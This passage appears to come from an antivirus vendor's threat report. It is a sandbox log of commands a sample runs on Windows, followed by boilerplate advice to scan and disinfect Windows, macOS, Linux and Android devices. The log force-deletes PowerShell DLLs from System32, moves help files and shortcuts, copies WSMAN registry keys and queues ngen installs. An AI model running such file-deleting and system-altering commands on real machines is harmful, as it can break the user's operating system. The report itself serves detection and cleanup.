  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GraphicalHost.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll""
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=m...
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\quadfold.rtf %WINDIR%\$NtUninstallKB968930$\.\quadfold.rtf
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\releasenotes.rtf %WINDIR%\$NtUninstallKB968930$\.\releasenotes.rtf
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\gettingstarted.rtf %WINDIR%\$NtUninstallKB968930$\.\gettingstarted.rtf
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_associative_array.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_associative_array.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_command_search.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_command_search.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_globbing.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_globbing.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y "%ALLUSERSPROFILE%\Start Menu\Programs\Windows PowerShell 1.0\Windows PowerShell.lnk" "%WINDIR%\$NtUninstallKB968930$\Windows PowerShell.lnk"
  • '<SYSTEM32>\cmd.exe' /c md %WINDIR%\$NtUninstallKB968930$\.
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll <SYSTEM32>\WindowsPowerShell...
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll <SYSTEM32>\WindowsPowe...
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_._31bf3856ad364e35\System.Management.Automation.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll <SYSTEM32>\WindowsPowerShell\v1.0
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll <SYSTEM32>\WindowsPowerShell\v1.0
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll <SYSTEM32>\WindowsPowerShell\v1.0
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll <SYSTEM32>\WindowsPowerShell\v1.0
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll <SYSTEM32>\WindowsPowerShell\v1.0
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Plugin /s /f
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\CertMapping HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\CertMapping /s /f
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Listener HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Listener /s /f
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Service HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Service /s /f
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Client HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Client /s /f
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration /f
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_array.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_array.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_alias.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_alias.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_escape_character.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_escape_character.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_environment_variable.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_environment_variable.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_script_block.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_script_block.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_regular_expression.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_regular_expression.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_pipeline.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_pipeline.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_provider.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_provider.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_where.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_where.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_wildcard.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_wildcard.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_property.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_property.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_system_state.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_system_state.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_shell_variable.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_shell_variable.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_types.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_types.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_filter.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_filter.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_function.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_function.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_method.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_method.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_execution_environment.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_execution_environment.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_location.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_location.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_logical_operator.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_logical_operator.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_flow_control.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_flow_control.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_namespace.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_namespace.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_operator.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_operator.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_display.xml.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_display.xml.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_parameter.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_parameter.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_object.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_object.help.txt
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_scope.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_scope.help.txt
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play